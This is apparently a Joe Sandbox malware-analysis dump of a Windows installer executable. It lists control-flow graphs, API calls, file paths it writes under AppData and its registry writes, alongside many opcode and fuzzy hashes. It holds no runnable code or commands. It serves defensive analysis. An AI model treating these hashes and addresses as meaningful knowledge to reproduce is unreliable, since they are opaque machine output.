                                                  • GetLastError.KERNEL32 ref: 00405785
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040579A
                                                  • GetLastError.KERNEL32 ref: 004057A4
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405754
                                                  • C:\Users\user\Desktop, xrefs: 0040572E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-2028306314
                                                  • Opcode ID: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                  • Instruction ID: d10382b71f01f386bba03ee380318ec3e3b09e45dfe00312e2f61c9024105f83
                                                  • Opcode Fuzzy Hash: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                  • Instruction Fuzzy Hash: 82010471D10619EADF109FA4DA04BEFBBB8EF14314F00403AD945B6290E77896088FA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 673 40646b-40648b GetSystemDirectoryA 674 40648d 673->674 675 40648f-406491 673->675 674->675 676 4064a1-4064a3 675->676 677 406493-40649b 675->677 679 4064a4-4064d6 wsprintfA LoadLibraryExA 676->679 677->676 678 40649d-40649f 677->678 678->679
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406482
                                                  • wsprintfA.USER32 ref: 004064BB
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction ID: c390764595a0a4e8c5ef638620d3c4371d91d6a13df4ef9e5d2f3a730445ac55
                                                  • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                  • Instruction Fuzzy Hash: 5DF0F63050061A6BDF149B64DD0DFFB365CAF08305F14047AAA86E20C1EABCD9258B5D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 680 405d09-405d13 681 405d14-405d3f GetTickCount GetTempFileNameA 680->681 682 405d41-405d43 681->682 683 405d4e-405d50 681->683 682->681 685 405d45 682->685 684 405d48-405d4b 683->684 685->684
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405D1D
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405D37
                                                  Strings
                                                  • nsa, xrefs: 00405D14
                                                  • "C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 00405D09
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1932135698
                                                  • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction ID: d70fdf4684184e9e49a6c992afbb8c38346e2f0ad7ed1da82a4e26761949b0bc
                                                  • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction Fuzzy Hash: 7FF082363046047BDB119F55DC08B9B7B9CEF91750F10C03BFA489A180D6B099648B59

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 686 734016db-73401717 call 73401a98 690 73401834-73401836 686->690 691 7340171d-73401721 686->691 692 73401723-73401729 call 734022af 691->692 693 7340172a-73401737 call 734022f1 691->693 692->693 698 73401767-7340176e 693->698 699 73401739-7340173e 693->699 700 73401770-7340178c call 734024d8 call 73401559 call 73401266 GlobalFree 698->700 701 7340178e-73401792 698->701 702 73401740-73401741 699->702 703 73401759-7340175c 699->703 726 734017e3-734017e7 700->726 704 73401794-734017da call 7340156b call 734024d8 701->704 705 734017dc-734017e2 call 734024d8 701->705 708 73401743-73401744 702->708 709 73401749-7340174a call 73402a38 702->709 703->698 706 7340175e-7340175f call 73402cc3 703->706 704->726 705->726 719 73401764 706->719 714 73401751-73401757 call 734026b2 708->714 715 73401746-73401747 708->715 722 7340174f 709->722 725 73401766 714->725 715->698 715->709 719->725 722->719 725->698 729 73401824-7340182b 726->729 730 734017e9-734017f7 call 7340249e 726->730 729->690 732 7340182d-7340182e GlobalFree 729->732 736 734017f9-734017fc 730->736 737 7340180f-73401816 730->737 732->690 736->737 739 734017fe-73401806 736->739 737->729 738 73401818-73401823 call 734014e2 737->738 738->729 739->737 741 73401808-73401809 FreeLibrary 739->741 741->737
                                                  APIs
                                                    • Part of subcall function 73401A98: GlobalFree.KERNEL32(?), ref: 73401D09
                                                    • Part of subcall function 73401A98: GlobalFree.KERNEL32(?), ref: 73401D0E
                                                    • Part of subcall function 73401A98: GlobalFree.KERNEL32(?), ref: 73401D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 73401786
                                                  • FreeLibrary.KERNEL32(?), ref: 73401809
                                                  • GlobalFree.KERNEL32(00000000), ref: 7340182E
                                                    • Part of subcall function 734022AF: GlobalAlloc.KERNEL32(00000040,?), ref: 734022E0
                                                    • Part of subcall function 734026B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73401757,00000000), ref: 73402782
                                                    • Part of subcall function 7340156B: wsprintfA.USER32 ref: 73401599
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1818278382.0000000073401000.00000020.00000001.01000000.00000006.sdmp, Offset: 73400000, based on PE: true
                                                  • Associated: 00000000.00000002.1818246559.0000000073400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000000.00000002.1818304122.0000000073403000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000000.00000002.1818325879.0000000073405000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: a2ee92341a43a33d6d211da3318ad57fb9aa11adc9599ff8cb1f2d60d883d154
                                                  • Instruction ID: 0486849aa3aaa05fd9e0c47225a839307ec16f93e9f39c73040107470d856f6f
                                                  • Opcode Fuzzy Hash: a2ee92341a43a33d6d211da3318ad57fb9aa11adc9599ff8cb1f2d60d883d154
                                                  • Instruction Fuzzy Hash: 034167763003089BDB0DAF748AC4B9537FCBB05214F1894F9E94B6B2C5EB748545CBA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 743 4031bd-4031e5 GetTickCount 744 403315-40331d call 402d75 743->744 745 4031eb-403216 call 40333c SetFilePointer 743->745 750 40331f-403323 744->750 751 40321b-40322d 745->751 752 403231-40323f call 403326 751->752 753 40322f 751->753 756 403245-403251 752->756 757 403307-40330a 752->757 753->752 758 403257-40325d 756->758 757->750 759 403288-4032a4 call 40661e 758->759 760 40325f-403265 758->760 766 403310 759->766 767 4032a6-4032ae 759->767 760->759 761 403267-403282 call 402d75 760->761 765 403287 761->765 765->759 768 403312-403313 766->768 769 4032b0-4032b8 call 405d81 767->769 770 4032d1-4032d7 767->770 768->750 773 4032bd-4032bf 769->773 770->766 772 4032d9-4032db 770->772 772->766 774 4032dd-4032f0 772->774 775 4032c1-4032cd 773->775 776 40330c-40330e 773->776 774->751 777 4032f6-403305 SetFilePointer 774->777 775->758 778 4032cf 775->778 776->768 777->744 778->774
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004031D1
                                                    • Part of subcall function 0040333C: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040303A,?), ref: 0040334A
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004030E7,00000004,00000000,00000000,?,?,00403061,000000FF,00000000,00000000,0040A130,?), ref: 00403204
                                                  • SetFilePointer.KERNELBASE(0000479E,00000000,00000000,004138D8,00004000,?,00000000,004030E7,00000004,00000000,00000000,?,?,00403061,000000FF,00000000), ref: 004032FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID: @`
                                                  • API String ID: 1092082344-2482669521
                                                  • Opcode ID: b37c68d16c1e2cc8bcc43cbec7eddd86f1f9b459397c41243b1695128786c8d7
                                                  • Instruction ID: 2eb32f2058f3ac64652d06d896ff17a4e06706ddedbbff73a9ebd321f9682ef1
                                                  • Opcode Fuzzy Hash: b37c68d16c1e2cc8bcc43cbec7eddd86f1f9b459397c41243b1695128786c8d7
                                                  • Instruction Fuzzy Hash: 91314F726002059BD710BF69EE8486A3BECEB85356714863FE900B22F1DB349D46DB9D
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000023,00000011,00000002), ref: 00402488
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,00000011,00000002), ref: 004024C5
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,00000011,00000002), ref: 004025A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
                                                  • API String ID: 2655323295-2847000489
                                                  • Opcode ID: 3504135b5e5c8ff2c76b6f7f6dbb6664eb131b02aa08a31f3a422f6b984d7780
                                                  • Instruction ID: cda3e9270739bd470938d6675586713e64603b6b61acdd46d726f9ba96aa6e5f
                                                  • Opcode Fuzzy Hash: 3504135b5e5c8ff2c76b6f7f6dbb6664eb131b02aa08a31f3a422f6b984d7780
                                                  • Instruction Fuzzy Hash: 64119071E00218AFEB01AFA58E49EAEBBB4EB48314F12443BF504B72C1D6B85D419A18
                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                    • Part of subcall function 00405268: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
                                                    • Part of subcall function 00405268: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 4fe8277303d41942324ba79c4865d2697f32ab6434a7e50bbebc34c2c0b33bff
                                                  • Instruction ID: 80b21b969d6ebc687a9b8df38f4f0a36329d2626e066ad813a30d40d344f2c23
                                                  • Opcode Fuzzy Hash: 4fe8277303d41942324ba79c4865d2697f32ab6434a7e50bbebc34c2c0b33bff
                                                  • Instruction Fuzzy Hash: D7210B31900214ABCF117FA4CF8DA9D75B4AF05318F61413BF511B62D0C7FC8942961E
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                  • Instruction ID: 8b1a66862eed69ce562a1c013b09e470fd8cd67d05fd9df1f25174a21af08f5a
                                                  • Opcode Fuzzy Hash: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                  • Instruction Fuzzy Hash: 9E115832504109BBEF129F90DF09B9E7B6DEB54340F204036B945B61E0E7B59E15AA68
                                                  APIs
                                                    • Part of subcall function 00405B72: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,?,00405BDE,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
                                                    • Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B85
                                                    • Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B99
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 0040572E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405771
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness
                                                  • API String ID: 1892508949-3736904667
                                                  • Opcode ID: 8680f504540a7c4727e477ff43f935ca4ca7c6937ce15ea4aa9492ef81a9a6c3
                                                  • Instruction ID: d3ae0468afaa7428e79bfc0127583e9526656a64469f48c10d8fdc1a09075470
                                                  • Opcode Fuzzy Hash: 8680f504540a7c4727e477ff43f935ca4ca7c6937ce15ea4aa9492ef81a9a6c3
                                                  • Instruction Fuzzy Hash: 98112731504140EBCF216FB55D4197F36B4EE96724F28053FE8D1B62E2C63C4942A66F
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,0040626C,80000002), ref: 0040606E
                                                  • RegCloseKey.KERNELBASE(?,?,0040626C,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 00406079
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                  • Instruction ID: d8e94d33599d7c42ce05b7954ac34d9409fddb4a37f2240ff2d92080e6d1935f
                                                  • Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                  • Instruction Fuzzy Hash: 0601BC72500209ABDF22CF20CD09FDB3FA9EF44364F00403AFA05A2190D378D924CBA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6074d66966345a0511974f5537eaaf60afeeaa24ac05f9c22eec821414083a3c
                                                  • Instruction ID: d064f3aa3bd4e65581b7a02d8d7766993962991d4d56626c18abd3cfb9ccca21
                                                  • Opcode Fuzzy Hash: 6074d66966345a0511974f5537eaaf60afeeaa24ac05f9c22eec821414083a3c
                                                  • Instruction Fuzzy Hash: 18A12271E00229CBDF28CFA8C8946ADBBB1FF44305F15856ED456BB281C7786A86DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
